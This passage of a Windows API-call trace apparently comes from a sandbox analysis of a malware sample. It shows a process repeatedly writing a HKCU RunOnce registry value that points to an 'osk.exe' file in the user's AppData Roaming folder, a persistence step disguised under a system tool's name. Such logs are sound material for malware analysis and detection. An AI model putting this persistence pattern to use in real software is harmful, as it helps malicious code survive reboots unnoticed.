hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.684] RegCloseKey (hKey=0x280) returned 0x0 [0103.684] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.684] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.684] SetTimer (hWnd=0x20280, nIDEvent=0x23db, uElapse=0xa, lpTimerFunc=0x0) returned 0x23db [0103.684] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.699] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.699] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.699] KillTimer (hWnd=0x20280, uIDEvent=0x23db) returned 1 [0103.699] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.700] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.700] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.700] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.700] RegCloseKey (hKey=0x280) returned 0x0 [0103.700] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.700] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.700] SetTimer (hWnd=0x20280, nIDEvent=0x23dc, uElapse=0xa, lpTimerFunc=0x0) returned 0x23dc [0103.701] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.715] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.715] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.715] KillTimer (hWnd=0x20280, uIDEvent=0x23dc) returned 1 [0103.716] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.717] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.717] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.717] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.717] RegCloseKey (hKey=0x280) returned 0x0 [0103.717] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.717] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.717] SetTimer (hWnd=0x20280, nIDEvent=0x23dd, uElapse=0xa, lpTimerFunc=0x0) returned 0x23dd [0103.717] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.732] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.732] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.732] KillTimer (hWnd=0x20280, uIDEvent=0x23dd) returned 1 [0103.733] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.733] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.733] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.733] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.734] RegCloseKey (hKey=0x280) returned 0x0 [0103.734] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.734] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.734] SetTimer (hWnd=0x20280, nIDEvent=0x23de, uElapse=0xa, lpTimerFunc=0x0) returned 0x23de [0103.734] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.847] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.847] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.847] KillTimer (hWnd=0x20280, uIDEvent=0x23de) returned 1 [0103.848] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.848] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.848] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.848] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.849] RegCloseKey (hKey=0x280) returned 0x0 [0103.849] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.849] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.849] SetTimer (hWnd=0x20280, nIDEvent=0x23df, uElapse=0xa, lpTimerFunc=0x0) returned 0x23df [0103.849] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.855] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.855] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.855] KillTimer (hWnd=0x20280, 
uIDEvent=0x23df) returned 1 [0103.855] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.855] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.856] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.856] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.856] RegCloseKey (hKey=0x280) returned 0x0 [0103.856] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.856] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.856] SetTimer (hWnd=0x20280, nIDEvent=0x23e0, uElapse=0xa, lpTimerFunc=0x0) returned 0x23e0 [0103.856] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.870] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.870] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.871] KillTimer (hWnd=0x20280, uIDEvent=0x23e0) returned 1 [0103.871] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.871] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.871] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.871] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.872] RegCloseKey (hKey=0x280) returned 0x0 [0103.872] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.872] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.872] SetTimer (hWnd=0x20280, nIDEvent=0x23e1, uElapse=0xa, lpTimerFunc=0x0) returned 0x23e1 [0103.872] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.886] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.886] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.886] KillTimer (hWnd=0x20280, uIDEvent=0x23e1) returned 1 [0103.886] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.887] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.887] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.887] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.887] RegCloseKey (hKey=0x280) returned 0x0 [0103.887] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.887] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.887] SetTimer (hWnd=0x20280, nIDEvent=0x23e2, uElapse=0xa, lpTimerFunc=0x0) returned 0x23e2 [0103.888] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.901] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.901] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.902] KillTimer (hWnd=0x20280, uIDEvent=0x23e2) returned 1 [0103.902] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0103.902] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.902] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.903] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.903] RegCloseKey (hKey=0x280) returned 0x0 [0103.903] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.903] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.903] SetTimer (hWnd=0x20280, nIDEvent=0x23e3, uElapse=0xa, lpTimerFunc=0x0) returned 0x23e3 [0103.903] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.917] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.917] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.917] KillTimer (hWnd=0x20280, uIDEvent=0x23e3) returned 1 [0103.918] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.918] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.918] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.918] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.919] RegCloseKey (hKey=0x280) returned 0x0 
[0103.919] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.919] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.919] SetTimer (hWnd=0x20280, nIDEvent=0x23e4, uElapse=0xa, lpTimerFunc=0x0) returned 0x23e4 [0103.919] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.952] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.952] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.952] KillTimer (hWnd=0x20280, uIDEvent=0x23e4) returned 1 [0103.952] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.953] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.953] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.953] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.953] RegCloseKey (hKey=0x280) returned 0x0 [0103.953] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.953] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.953] SetTimer (hWnd=0x20280, nIDEvent=0x23e5, uElapse=0xa, lpTimerFunc=0x0) returned 0x23e5 [0103.953] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.965] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.965] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.965] KillTimer (hWnd=0x20280, uIDEvent=0x23e5) returned 1 [0103.965] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.966] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.966] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.966] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.966] RegCloseKey (hKey=0x280) returned 0x0 [0103.966] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.966] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.966] SetTimer (hWnd=0x20280, nIDEvent=0x23e6, uElapse=0xa, lpTimerFunc=0x0) returned 0x23e6 [0103.966] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.979] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.979] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.980] KillTimer (hWnd=0x20280, uIDEvent=0x23e6) returned 1 [0103.980] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.981] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.981] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.981] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.981] RegCloseKey (hKey=0x280) returned 0x0 [0103.981] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.981] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.981] SetTimer (hWnd=0x20280, nIDEvent=0x23e7, uElapse=0xa, lpTimerFunc=0x0) returned 0x23e7 [0103.982] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.995] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.995] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.995] KillTimer (hWnd=0x20280, uIDEvent=0x23e7) returned 1 [0103.996] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.996] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.996] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.996] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.996] RegCloseKey (hKey=0x280) returned 0x0 [0103.997] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.997] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.997] SetTimer (hWnd=0x20280, nIDEvent=0x23e8, uElapse=0xa, lpTimerFunc=0x0) returned 0x23e8 [0103.997] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.011] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.011] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.011] KillTimer (hWnd=0x20280, uIDEvent=0x23e8) returned 1 [0104.011] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.012] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.012] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.012] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.012] RegCloseKey (hKey=0x280) returned 0x0 [0104.012] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.012] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.012] SetTimer (hWnd=0x20280, nIDEvent=0x23e9, uElapse=0xa, lpTimerFunc=0x0) returned 0x23e9 [0104.012] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.027] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.027] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.027] KillTimer (hWnd=0x20280, uIDEvent=0x23e9) returned 1 [0104.028] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.028] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.028] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.028] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.029] RegCloseKey (hKey=0x280) returned 0x0 [0104.029] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.029] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0104.029] SetTimer (hWnd=0x20280, nIDEvent=0x23ea, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ea [0104.029] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.042] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.042] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.042] KillTimer (hWnd=0x20280, uIDEvent=0x23ea) returned 1 [0104.042] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.043] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.043] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.043] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.043] RegCloseKey (hKey=0x280) returned 0x0 [0104.043] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.044] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.044] SetTimer (hWnd=0x20280, nIDEvent=0x23eb, uElapse=0xa, lpTimerFunc=0x0) returned 0x23eb [0104.044] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.058] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.058] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.058] KillTimer (hWnd=0x20280, uIDEvent=0x23eb) returned 1 [0104.059] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.059] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.059] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.059] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.059] RegCloseKey (hKey=0x280) returned 0x0 [0104.060] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.060] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.060] SetTimer (hWnd=0x20280, nIDEvent=0x23ec, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ec [0104.060] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0104.073] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0104.073] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0104.073] KillTimer (hWnd=0x20280, uIDEvent=0x23ec) returned 1 [0104.074] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.074] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0104.074] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0104.074] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0104.074] RegCloseKey (hKey=0x280) returned 0x0 [0104.074] IUnknown:Release (This=0x7a9740) returned 0x1 [0104.075] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0104.075] SetTimer (hWnd=0x20280, nIDEvent=0x23ed, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ed 
